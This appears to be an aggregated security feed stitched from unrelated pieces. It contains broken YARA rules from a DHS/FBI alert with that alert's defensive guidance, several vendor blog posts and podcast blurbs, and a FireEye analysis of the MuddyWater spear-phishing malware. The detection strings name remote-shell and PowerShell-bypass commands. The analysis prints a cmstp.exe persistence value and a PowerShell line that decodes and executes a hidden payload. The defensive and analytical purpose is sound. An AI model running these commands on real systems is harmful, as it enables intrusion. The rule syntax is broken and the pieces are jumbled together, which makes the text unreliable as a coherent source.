            $s1 = "/ame_icon.png"

            $s2 = ""

            $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }

            $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }

            $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"

            $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"

            $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE="

            $s8 = "NlZzSZk="

            $s9 = "WlJTb1q5kaxqZaRnser3sw=="

            $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"

            $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"

            $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"

            $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }

            $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }

            $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }

//inveigh pentesting tools

            $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }

//specific malicious word document PK archive

            $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }

            $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }

            $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }

            $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }

            $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }

            $s22 = ""

            $s23 = ""

            $s24 = "/1/ree_stat/p"

            $s25 = "/icon.png"

            $s26 = "/pshare1/icon"

            $s27 = "/notepad.png"

            $s28 = "/pic.png"

            $s29 = ""



            ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)





rule APT_malware_2



      description = "rule detects malware"

      author = "other"



      $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }

      $http_push = "X-mode: push" nocase

      $http_pop = "X-mode: pop" nocase



      any of them





rule Query_XML_Code_MAL_DOC_PT_2



     name= "Query_XML_Code_MAL_DOC_PT_2"

     author = "other"




            $zip_magic = { 50 4b 03 04 }

            $dir1 = "word/_rels/settings.xml.rels"

            $bytes = {8c 90 cd 4e eb 30 10 85 d7}



            $zip_magic at 0 and $dir1 and $bytes





rule Query_Javascript_Decode_Function



      name= "Query_Javascript_Decode_Function"

      author = "other"



      $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}

      $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}

      $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}

      $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}




      filesize < 20KB and #func_call > 20 and all of ($decode*)






rule Query_XML_Code_MAL_DOC



      name= "Query_XML_Code_MAL_DOC"

      author = "other"



      $zip_magic = { 50 4b 03 04 }

      $dir = "word/_rels/" ascii

      $dir2 = "word/theme/theme1.xml" ascii

      $style = "word/styles.xml" ascii



      $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd





rule z_webshell



            description = "Detection for the z_webshell"

            author = "DHS NCCIC Hunt and Incident Response Team"

            date = "2018/01/25"

            md5 =  "2C9095C965A55EFC46E16B86F9B7D6C6"



            $aspx_identifier1 = "<%@ " nocase ascii wide

            $aspx_identifier2 = "<asp:" nocase ascii wide

            $script_import = /(import|assembly) Name(space)?\=\"(System|Microsoft)/ nocase ascii wide

            $case_string = /case \"z_(dir|file|FM|sql)_/ nocase ascii wide

            $webshell_name = "public string z_progname =" nocase ascii wide

            $webshell_password = "public string Password =" nocase ascii wide



            1 of ($aspx_identifier*)

            and #script_import > 10

            and #case_string > 7

            and 2 of ($webshell_*)

            and filesize < 100KB



This actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.


DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity.


Network and Host-based Signatures

DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity.


Detections and Prevention Measures

  • Users and administrators may detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:
    • network intrusion detection system/network intrusion protection system logs,
    • web content logs,
    • proxy server logs,
    • domain name server resolution logs,
    • packet capture (PCAP) repositories,
    • firewall logs,
    • workstation Internet browsing history logs,
    • host-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,
    • data loss prevention logs,
    • exchange server logs,
    • user mailboxes,
    • mail filter logs,
    • mail content logs,
    • AV mail logs,
    • OWA logs,
    • Blackberry Enterprise Server logs, and
    • Mobile Device Management logs.
  • To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:
    • application logs,
    • IIS/Apache logs,
    • file system,
    • intrusion detection system/ intrusion prevention system logs,
    • PCAP repositories,
    • firewall logs, and
    • reverse proxy.
  • Detect spear-phishing by searching workstation file systems and network-based user directories, for attachment filenames and hashes found in the IOC packages.
  • Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.
  • Detect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.
  • Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.
  • Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.
  • Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.
  • Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.
  • Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.
  • Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.
  • Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)
  • Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.
  • Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal”. Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.
  • Detect installation by searching all proxy logs for downloads from URIs without domain names.


General Best Practices Applicable to this Campaign:

  • Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.
  • Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.
  • Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).
  • Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.
  • Segment any critical networks or control systems from business systems and networks according to industry best practices.
  • Ensure adequate logging and visibility on ingress and egress points.
  • Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.
  • Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.
  • Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.
  • Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.
  • Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.
  • Store system logs of mission critical systems for at least one year within a security information event management tool.
  • Ensure applications are configured to log the proper level of detail for an incident response investigation.
  • Consider implementing HIPS or other controls to prevent unauthorized code execution.
  • Establish least-privilege controls.
  • Reduce the number of Active Directory domain and enterprise administrator accounts.
  • Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.
  • Establish a password policy to require complex passwords for all users.
  • Ensure that accounts for network administration do not have external connectivity.
  • Ensure that network administrators use non-privileged accounts for email and Internet access.
  • Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).
  • Implement a process for logging and auditing activities conducted by privileged accounts.
  • Enable logging and alerting on privilege escalations and role changes.
  • Periodically conduct searches of publically available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have inadvertently been included.
  • Assign sufficient personnel to review logs, including records of alerts.
  • Complete independent security (as opposed to compliance) risk review.
  • Create and participate in information sharing programs.
  • Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan.


Report Notice

DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division ( or 855-292-3937).


Revision History

  • March 15, 2018: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Android Security 2017 Year in Review

Our team’s goal is simple: secure more than two billion Android devices. It’s our entire focus, and we’re constantly working to improve our protections to keep users safe.
Today, we’re releasing our fourth annual Android Security Year in Review. We compile these reports to help educate the public about the many different layers of Android security, and also to hold ourselves accountable so that anyone can track our security work over time.
We saw really positive momentum last year and this post includes some, but not nearly all, of the major moments from 2017. To dive into all the details, you can read the full report at:

Google Play Protect

In May, we announced Google Play Protect, a new home for the suite of Android security services on nearly two billion devices. While many of Play Protect’s features had been securing Android devices for years, we wanted to make these more visible to help assure people that our security protections are constantly working to keep them safe.

Play Protect’s core objective is to shield users from Potentially Harmful Apps, or PHAs. Every day, it automatically reviews more than 50 billion apps, other potential sources of PHAs, and devices themselves and takes action when it finds any.

Play Protect uses a variety of different tactics to keep users and their data safe, but the impact of machine learning is already quite significant: 60.3% of all Potentially Harmful Apps were detected via machine learning, and we expect this to increase in the future.
Protecting users' devices
Play Protect automatically checks Android devices for PHAs at least once every day, and users can conduct an additional review at any time for some extra peace of mind. These automatic reviews enabled us to remove nearly 39 million PHAs last year.

We also update Play Protect to respond to trends that we detect across the ecosystem. For instance, we recognized that nearly 35% of new PHA installations were occurring when a device was offline or had lost network connectivity. As a result, in October 2017, we enabled offline scanning in Play Protect, and have since prevented 10 million more PHA installs.

Preventing PHA downloads
Devices that downloaded apps exclusively from Google Play were nine times less likely to get a PHA than devices that downloaded apps from other sources. And these security protections continue to improve, partially because of Play Protect’s increased visibility into newly submitted apps to Play. It reviewed 65% more Play apps compared to 2016.

Play Protect also doesn’t just secure Google Play—it helps protect the broader Android ecosystem as well. Thanks in large part to Play Protect, the installation rates of PHAs from outside of Google Play dropped by more than 60%.

Security updates

While Google Play Protect is a great shield against harmful PHAs, we also partner with device manufacturers to make sure that the version of Android running on users' devices is up-to-date and secure.

Throughout the year, we worked to improve the process for releasing security updates, and 30% more devices received security patches than in 2016. Furthermore, no critical security vulnerabilities affecting the Android platform were publicly disclosed without an update or mitigation available for Android devices. This was possible due to the Android Security Rewards Program, enhanced collaboration with the security researcher community, coordination with industry partners, and built-in security features of the Android platform.

New security features in Android Oreo

We introduced a slew of new security features in Android Oreo: making it safer to get apps, dropping insecure network protocols, providing more user control over identifiers, hardening the kernel, and more.

We highlighted many of these over the course of the year, but some may have flown under the radar. For example, we updated the overlay API so that apps can no longer block the entire screen and prevent you from dismissing them, a common tactic employed by ransomware.

Openness makes Android security stronger

We’ve long said it, but it remains truer than ever: Android’s openness helps strengthen our security protections. For years, the Android ecosystem has benefitted from researchers’ findings, and 2017 was no different.

Security reward programs
We continued to see great momentum with our Android Security Rewards program: we paid researchers $1.28 million dollars, pushing our total rewards past $2 million dollars since the program began. We also increased our top-line payouts for exploits that compromise TrustZone or Verified Boot from $50,000 to $200,000, and remote kernel exploits from $30,000 to $150,000.

In parallel, we introduced Google Play Security Rewards Program and offered a bonus bounty to developers that discover and disclose select critical vulnerabilities in apps hosted on Play to their developers.

External security competitions
Our teams also participated in external vulnerability discovery and disclosure competitions, such as Mobile Pwn2Own. At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel. And of the exploits demonstrated against devices running Android, none could be reproduced on a device running unmodified Android source code from the Android Open Source Project (AOSP).

We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users.

Introducing CA Veracode Verified

Are you struggling to respond to customer and prospect concerns about the security of your application? Do you know what good application security looks like, or how to get there?

CA Veracode is pleased to announce the CA Veracode Verified program. With CA Veracode Verified, you prove at a glance that you’ve made security a priority, and that your security program is backed by one of the most trusted names in the industry. Without straining limited security resources, you’ll stay ahead of customer and prospect security concerns, speeding your sales cycle. In addition, the CA Veracode Verified program gives you a proven roadmap for maturing your application security program.

What is CA Veracode Verified?

CA Veracode Verified is an attestation of the process that a development team has in place to assess the security of an identified application. There are three tiers of the CA Veracode Verified program: You progress from Standard to Team to Continuous as your program matures and expands to include third-party components and secure coding strategies beyond just assessing the first-party code developed in-house. Check out our infographic for more details on each tier.

How will CA Veracode Verified benefit me?

Speed sales cycles: If your customers and prospects aren’t asking about the security of your software, they will be. With the increase in damaging breaches making headlines, customers, both consumers and businesses, will increasingly request assurance that your products won’t leave them vulnerable. But reacting to individual prospect or customer concerns about security for every application is a time-consuming and expensive endeavor that lengthens, or even ends, sales cycles. With CA Veracode Verified, you stay ahead of the security concerns by proving at a glance that your application was developed with security in mind, making security your competitive advantage!

Prove the security of your development process: CA Veracode Verified attests that your development team implements secure coding practices and has integrated security into the development process. This attestation assures your customers that you were focused on security from the start when building this product, and that you’ve made secure code an element of high-quality code. It also gives you third-party validation of the security of your software with one of the most respected and trusted names in the security industry. The Verified attestation is backed by CA Veracode’s industry-leading platform and programmatic approach, 10+ years’ experience , more than 65 trillion lines of code scanned and more than 30 million flaws fixed.

Don’t strain limited security resources responding to customer and prospect requests for security attestations: Remove your limited security resources from the endless firefighting that is responding to customer and prospect requests for security attestation. The CA Veracode Verified seal fosters confidence and trust in your products so that your security teams can focus resources on other value-added tasks and initiatives.

Articulate the value of investment in security to the Board: When security speeds sales cycles and frees up resources, the Board takes notice. Additionally, by moving through each tier, you can use the Verified program to demonstrate progress in application security initiatives and the value of the investment.

Is your app Verified?

Have you started down the AppSec path? As a CA Veracode customer, you might be Verified already! Check out our infographic for details on each level. If your application qualifies for a Verified status, there are a few ways you can promote the security you have built into your application , including a Verfied seal you can display on your website, an attestation letter you can share with customers and prospects and a press release template you can use to share the news. We’ll also add your name to our Verified Directory, visible to your prospects, customers and competitors.

Want to get Verified, or move up to Verified Team or Verified Continuous? Check out our eBook to see what that entails, and contact us to get started!

Give your customers confidence that your software is secure …Verify it.

Work On It Together – Business Security Weekly #77

This week, Michael and Paul interview Futurist Thornton May, and CSO of Cisco Systems, Inc., Edna Conway! Then the articles of discussion and tracking security innovation! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Voice Bio, Deep Neural Networks, and the Search for a Seamless Customer Experience

Opus Research and Pindrop Discuss the Future of Voice

The trial period of voice biometrics is over — the proof points surrounding voice biometrics have been determined, with customer experience, efficiencies, and fraud in mind. Voice biometrics, along with help from deep neural networks (DNN), allows fraud attacks to be mitigated through multi-layered solutions.

Last week, the founder of Opus Research, Dan Miller, and the Director of Authentication at Opus, Ravin Sanjith, sat down with Matt Garland, our VP of Research, for a conversation about the current state and potential evolution of voice biometrics.

As we navigate through different channels, the purpose of voice biometrics remains the same — to provide a unique, secure element to a multi-factored authentication solution. Within the phone channel, and specifically the call center, voice biometrics alone can only do so much, and the human factor serves as a perennial risk. Fraudsters continue to take advantage of the call center, where fraud is often originates, with vishing and social engineering attacks — causing a snowball effect and pushing fraud into other channels. This common occurrence validates the need for continuity in authentication as we move freely between channels.

Previous challenges faced in biometrics have been met with new technology, including DNNs — a series of layers of nodes that work as data approximators. These DNNs break down problems and teach the networks new functions — enhancing voice biometrics. Additionally, DNNs enable text independence for voice biometric systems, with passive enrollment that ensures a seamless customer experience.  To learn more about voice biometrics and deep neural networks, watch the on-demand session here.

The post Voice Bio, Deep Neural Networks, and the Search for a Seamless Customer Experience appeared first on Pindrop.

Debunking Common GDPR Myths

Many impacted organisations remain unprepared for – and even unaware of GDPR, and to help mitigate risks of noncompliance, it’s critical to understand the realities of the new data protection laws.


Information Security

Many impacted organisations remain unprepared for – and even unaware of GDPR, and to help mitigate risks of noncompliance, it’s critical to understand the realities of the new data protection laws.

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign


From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.

Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe. The process chain is shown in Figure 2.

Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.

Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:

Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. What follows is four examples, and a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.

Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.

Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.

Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.

Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, the execution will only be observed in operating systems, Windows 7 and above. The following are the three files:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

= cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:


That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.

Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.

SCT File Analysis

The code of the Defender.sct file is an obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini)

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.

Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.

Figure 11: PowerShell script is XOR encoded using a single byte key

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.

Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:

Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.

Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If command starts with “excel”, then it leverages DDEInitiate Method of Excel.Appilcation to execute the code: 
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code: 
    • If the command starts with “risk”, then execution is performed through DCOM object: 
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV

Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.

Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command



Reboot the system using shutdown command


Shut down the system using shutdown command


Wipe the Drives, C:\, D:\, E:\, F:\


Take a screenshot of the System


Encrypt and upload the information from the system


Leverage Excel.Application COM object for code execution


Leverage Outlook.Application COM object for code execution


Leverage DCOM object for code execution


This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they deter the process of reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

SHA256 Hash


Targeted Region






Invest in Turkey.doc



güvenlik yönergesi. .doc







Türkiye Cumhuriyeti Kimlik Kartı.doc



Turkish Armed Forces.doc

























Connectel .pk.doc









Gvenlik Ynergesi.doc



Gvenlik Ynergesi.doc






Anadolu Güneydoğu Projesinde .doc


Network Indicators

List of Proxy URLs








































































































































































































































































































































































































































































Security Tools Checked on the Machine





























Security: Create a Development Champion

We talk a lot about the need for development teams to create security champions. With the shift to DevOps – and the intersecting of development, security, and operations teams – development and security teams can no longer operate in their traditional silos. Each team needs to not only work closely together, but also have a much deeper understanding of each others’ pains, processes, and priorities. For most developers, this is uncharted territory. Security has simply not been part of their jobs or training. In fact, the vast majority have not had training on secure coding, either in college or on the job. We solve this problem in part here at CA Veracode by creating security champions on our development teams, and we recommend and coach our customers to do the same. Security champions help to reduce culture conflict between development and security by amplifying the security message on a peer-to-peer level. They don’t need to be experts, more like the “security consciousness” of the group.

But what about a development champion on the security team? Just as developers are in uncharted territory with security, the security team often has limited understanding of how the development team works. What if the security team had a development champion who was tasked with getting to know and understand the development team and their processes and bringing that knowledge and understanding back to the team? The reality is that in a DevOps world, the security team does need a much more thorough understanding of the development process than they did in the past; they simply won’t be able to do their jobs effectively and integrate security into the development process without a deep understanding of how this team works.

The development champion would spend time with the development team, getting a clear picture of their day-to-day tasks, their priorities, their pain points. Additionally, this person would spend some time learning how to code and becoming familiar with the tools developers use, and bring that understanding back to his or her team. Finally, as security shifts left, the security team will need at least a high-level understanding of developer tools like IDEs, build systems, and configuration management tools, in order to embed security tools and processes into developer workflows. What does a development champion look like?

Check out the Anatomy of a Development Champion:

Want to be the development champion on your team?

Start with our toolkit – Understanding the Dev in DevSecOps: A Toolkit for the Security Team.

Early Bird Gets The Worm – Application Security Weekly #08

This week, Paul and Keith talk about “The Phoenix Project”, Amazon admits Alexa is creepily laughing at people, Ethereum fixes serious ‘eclipse’ flaw, Kali Linux is now an app in the Windows App Store, Docker + Minecraft = Dockercraft, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Measure Security Performance, Not Policy Compliance

